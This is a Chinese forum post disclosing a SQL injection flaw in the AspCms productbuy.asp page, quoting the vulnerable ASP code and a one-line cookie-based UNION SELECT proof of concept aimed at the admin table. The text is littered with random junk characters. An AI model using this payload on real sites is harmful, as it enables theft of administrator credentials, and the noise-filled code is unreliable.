好久没上土司了,上来一看发现在删号名单内.....* J/ W. c$ b) a" v4 W+ b, z
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
- e3 R( F% k* {: j$ |5 W% c5 ]废话不多说,看代码:
( e8 V! b% L7 Y8 H
5 B' O. Y7 J0 h; [$ F7 n+ _# x+ Y& ]- I<%$ @# p8 m1 x% }3 }
1 Z4 n4 l* U1 R$ Z5 Mif action = "buy" then
9 W) H7 U1 ^, l9 ^9 }8 l+ Q3 X
" L* Y) p+ u3 ]9 l! ~$ t addOrder()
# d: g* r8 E: R9 \. U) B3 _$ I: ~; w) _. h7 A2 o% J
else9 M0 L4 C6 z+ Q' e4 u
$ L2 O. ^+ ~/ @& n% _* ?" H" u0 Q echoContent()1 H# o1 s& I% g/ {5 m0 K; [
4 X4 q: Y5 W$ \+ X+ A. H1 hend if; P. k+ H* ]3 N8 p6 U/ v& G- y
5 d# {4 r% c8 R! Q
0 F1 T2 d: J/ P3 D: {" Q# ` v$ ^6 n! y4 k3 ]0 X m7 w0 {8 ~/ {
……略过# p' _( r5 c, M) k
( R. ~ W" y' M4 A( v }# c" n# ?0 Y
: A j! P1 ?* f5 ?Sub echoContent()9 j# A/ q4 V9 l! h$ Z, f M; D
9 t1 T! ` B0 X( q: [- l
dim id4 B4 G* |; M% u7 E* }( p/ l! ?# h+ s$ E
: P9 w0 G! N1 I# k id=getForm("id","get")# ]' n; R' @/ A
) v9 C! K( F# _2 ~ : C e; x( e n, k+ c! @
% [( i( `9 _+ c: j, t9 k% o
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
" a) M, f S r- i# y; }% a+ I( x+ e+ b; j' m; C" S
2 h9 H- v8 T+ ~ G- [& N5 L4 D X7 @) ~2 P( z
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template") y0 i2 I) \* l9 v; e
7 l5 t, N+ |% u5 l+ p dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct4 Y& V0 H6 D# ?& I4 q/ Z
: u4 Y' Q% z1 v
Dim templatePath,tempStr
* q W/ M2 [8 Z+ A# h( D4 [- z* `) s3 S. [& m
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
8 ~7 d, l3 I: q9 E3 D% ^$ n# D3 `" k5 r9 X4 F* _9 I: l# f
' ~0 A0 z1 h: }7 T" m8 S( `7 v4 F0 f o0 C9 K2 P4 ?- P7 f
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
) ^. p) M. |9 q! I- Z4 u, F; V5 z$ y V0 C2 }
selectproduct=rsObj(0)2 D Y* N+ \+ m9 ^. p5 u
8 M& V. ?& f7 U9 Y , H$ k4 g) x5 b
# f' D7 ~1 Z1 B( J
Dim linkman,gender,phone,mobile,email,qq,address,postcode# y3 ^3 q3 [0 E* t' k
8 l9 V0 q% L5 H% B# t
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
2 X4 }# \6 y4 a; ^. i; T$ p2 _7 h. f6 e( L" T; J
if rCookie("loginstatus")=1 then
' x! l: M2 u; N% m# d& x& w9 G1 G x7 @* ?4 ^% d
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1"), |8 {8 Q, A6 R# v7 x
# k( s2 z% x3 O8 H0 D) I linkman=rsObj("truename")0 a+ a* M+ u6 U3 a6 Y$ \* p
+ M/ q/ S! D4 r8 s7 n1 u
gender=rsObj("gender")* x8 E& t/ c7 d9 O R5 |- g3 h& P
& C1 \1 P' ]3 v9 h6 I/ B; H phone=rsObj("phone")4 Y! _# y) w, ?0 q8 o- v/ p, p
/ w2 a, r0 y/ i9 s; K* L
mobile=rsObj("mobile")
6 Y& B; s: \, R- N5 n: R+ s6 a9 j! T3 b9 g- j- G, h+ B, V2 X ~( o
email=rsObj("email")
2 \8 P7 C8 _ O T: {
! Q/ S6 a, I5 x) y' _7 R qq=rsObj("qq")8 M [0 m: |9 \0 c. F/ t2 A
/ A1 j* Q" R& Y
address=rsObj("address")% t$ E& J: U. J5 b$ }# n
* P7 c8 {0 F4 w* \* {$ B8 N! {
postcode=rsObj("postcode")
6 d" \" w1 {+ W; j! Y: F
! @' \( l( _' |# l else : {/ _$ D# w3 z1 n5 h2 h
. A. ]$ @' f( z3 m7 a gender=10 v4 M5 m" {* q
9 E; n0 A# W+ ]6 z+ P
end if6 C3 X9 V' ~. _3 Q" M) y( f
, I5 I7 W7 G; ~/ L: k8 e, V rsObj.close()
$ x7 _9 l6 O% [4 b, D
, U) y" ~1 A5 t9 R1 i2 Z4 m ; o: H- T5 k8 l
@5 @, j6 K) o2 t; R7 f
with templateObj
; |0 k$ E# X2 S. Y5 w
) ~3 ~7 t" m$ g: H& q& J .content=loadFile(templatePath)
6 W6 E4 k8 c- }; T' P8 s
8 ]3 T6 y! J5 L: s! b$ K .parseHtml()8 v" U# p% j# a
9 y! z0 b; B8 [6 r
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
' `5 P$ L# ]* c3 K0 u9 K" H: q3 M8 }3 P; D& {/ D
.content=replaceStr(.content,"[aspcms:linkman]",linkman)
; i* [3 n; J) x4 ?7 ]
0 @4 A. i' o) M5 l% w4 |9 D- p .content=replaceStr(.content,"[aspcms:gender]",gender) 2 g: n2 Y$ l& ?+ S6 ~0 m* n
, M& I$ x7 y( K' j+ K* i3 T o .content=replaceStr(.content,"[aspcms:phone]",phone) ; N, m+ K8 G- d& i
3 N, ?4 u: E8 I. a' N8 D .content=replaceStr(.content,"[aspcms:mobile]",mobile)
' o! A6 q0 ~! U7 v( w
6 ?' E, h. u# s' e4 C2 Y# x .content=replaceStr(.content,"[aspcms:email]",email)
3 o" x! {2 _: k( s+ ^/ n( w) N. y
.content=replaceStr(.content,"[aspcms:qq]",qq) 8 a) G( d8 f1 O3 k% t2 W
" u7 ^) w& L. | .content=replaceStr(.content,"[aspcms:address]",address)
0 s" M6 I7 O+ t! H+ Q$ u
3 G' m4 f. S- R7 c .content=replaceStr(.content,"[aspcms:postcode]",postcode)
" z" s3 y& G. l8 o4 |( I+ z) s
& ^0 E. }% x" n0 p .parseCommon()
- P& L( H5 B& t
! [/ e( [/ I7 k+ g# x+ ]! B echo .content
2 [8 k0 _! B) Z+ a# C; [* u* Q2 S, i' I: l, F E
end with
; I5 `) ?. A6 n/ G
2 Q( ?4 F8 ?# q, L7 f set templateobj =nothing : terminateAllObjects( C( }( {5 E+ Q" u% ?2 Y
% d6 r( y% H* R8 X9 L8 ?End Sub/ ^& Z) y8 ?; z; U% }
漏洞很明显,没啥好说的
/ P% L4 r& k7 X4 D; F9 W0 K( B( Ipoc:( G6 `5 h6 w( {+ I- Y \3 `
" \* w2 [5 h- k+ H
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
# @$ k: Y) m2 R. P9 \5 f
& P% Z1 I7 [( W$ e6 S |
发表于 2012-12-27 08:35:05
收藏
支持
反对